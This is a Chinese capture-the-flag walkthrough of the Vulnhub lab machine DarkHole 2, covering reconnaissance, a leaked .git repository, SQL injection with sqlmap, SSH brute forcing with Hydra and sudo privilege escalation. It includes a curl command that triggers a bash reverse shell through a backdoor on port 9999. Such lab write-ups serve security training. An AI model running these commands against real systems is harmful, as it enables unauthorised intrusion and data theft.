Vulnhub靶机：DARKHOLE_ 2

飞熊 • 2023年4月18日上午10:44 • 后端漫谈 • 阅读 232

介绍

系列：DarkHole（此系列共2台）
发布日期：2021年9月3日
提示：不要浪费时间进行暴力破解；使用Vmware虚拟机
难度：中
目标：取得 root 权限 + 2 Flag
攻击方法:

主机发现
端口扫描
信息收集
Git 库泄漏
SQL注入
本地端口转发
本地信息收集
密码爆破
水平提权
Root提权1、2

靶机地址：https://www.vulnhub.com/entry/darkhole-2,740/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.239.0/24

主机信息探测

nmap -p- 192.168.239.141
nmap -p22,80 192.168.239.141 -A

网站探测

开局就一个很简单的页面，右上角有个登录按钮，简单的弱口令和万能密码登录失败，开始看看nmap发现的git目录

看到了“COMMIT_EDITMSG”（最后一次提交数据时的描述文件），说明这是一个git库，那就下载下来看看里里面都是什么吧。

下载git库

下载git库的工具很多，我这里使用wget：wget -r http://192.168.239.141/.git/
查看更新日志，发现最后一次更新是把登录页面改的更安全了，在上一个版本中登录页面是使用默认的身份认证信息登录，那么，如何得知它是使用的什么身份认证呢？

下载了 .git 目录后，使用git clone . backup命令会将该目录创建一个backup的源码文件，可以在其中执行所有 git 操作，但不知道为什么我这里出错了，排雷太麻烦了，直接换用其他工具吧。

这里换用 git-dumper：https://github.com/arthaud/git-dumper

git clone https://github.com/arthaud/git-dumper.git
cd git-dumper
pip install -r requirements.txt
mkdir backup
python3 git_dumper.py http://192.168.239.141/.git/ backup

得到凭证信息：lush@admin.com、321

登录网站-sql注入

登录之后，页面很简单，注意到地址栏中存在id值，简单尝试一下发现存在sql注入，那就直接sqlmap跑起来

跑sqlmap直接获取所有的表和数据，其中一个名为SSH的表中有明文的用户名和密码，这是很明显的暗示了。

sqlmap -u "http://192.168.239.141/dashboard.php?id=1" --cookie="PHPSESSID=f47eq9gff8l7n2n804d2te1bug" --batch --dbs
sqlmap -u "http://192.168.239.141/dashboard.php?id=1" --cookie="PHPSESSID=f47eq9gff8l7n2n804d2te1bug" --batch -D darkhole_2 --dump-all --batch

SSH登录

登录之后，根据内核版本的内核提权失败了。
先简单检查一下常规的敏感信息，感觉本地的9999端口是个突破口。

查看发现这里有一个后门！

提权方式1

命令执行-反弹shell

很蛋疼，折腾半天才借助bash反弹shell成功

curl http://localhost:9999/?cmd=bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E239%2E138%2F4444%200%3E%261%27

发现 losy 账户下的历史命令里面包含了它的密码，于是直接切换身份为 losy，并且发现可以sudo提权

额外补充

上面反弹shell的时候我是直接使用 curl 来完成的，这样做的原因是.bash_history里面就是这么做的，但是仔细翻看一下.bash_history可以知道，里面还有SSH本地端口转发，这里演示一下。
意义就是直接访问本地的9999端口，就可以访问到靶机的9999端口了。

sudo提权-2个flag

提权方式2

爆破用户SSH密码-sudo提权

使用hydra爆破出 lama 用户的SSH密码

然后直接sudo提权

文章由极客之音整理，本文链接：https://www.bmabk.com/index.php/post/134215.html